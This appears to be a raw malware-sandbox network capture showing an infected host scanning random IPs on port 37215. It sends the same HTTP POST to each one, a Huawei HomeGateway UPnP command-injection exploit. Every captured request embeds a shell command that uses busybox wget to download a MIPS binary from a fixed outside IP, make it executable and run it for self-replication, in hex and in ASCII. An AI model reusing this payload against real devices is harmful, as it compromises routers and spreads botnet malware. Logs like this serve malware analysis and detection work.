6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  329192.168.2.1357634157.30.89.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228302002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  330192.168.2.1351440124.6.76.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228332996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  331192.168.2.134274441.255.154.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228374004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  332192.168.2.134170441.118.148.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228394032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  333192.168.2.134599241.250.172.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228413105 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  334192.168.2.135656841.108.101.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228435040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  335192.168.2.1348486197.211.180.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228450060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  336192.168.2.136007631.208.182.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228471994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  337192.168.2.1340186103.179.255.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228490114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  338192.168.2.1346430157.18.167.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228514910 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  339192.168.2.1333168157.225.193.3737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228538990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
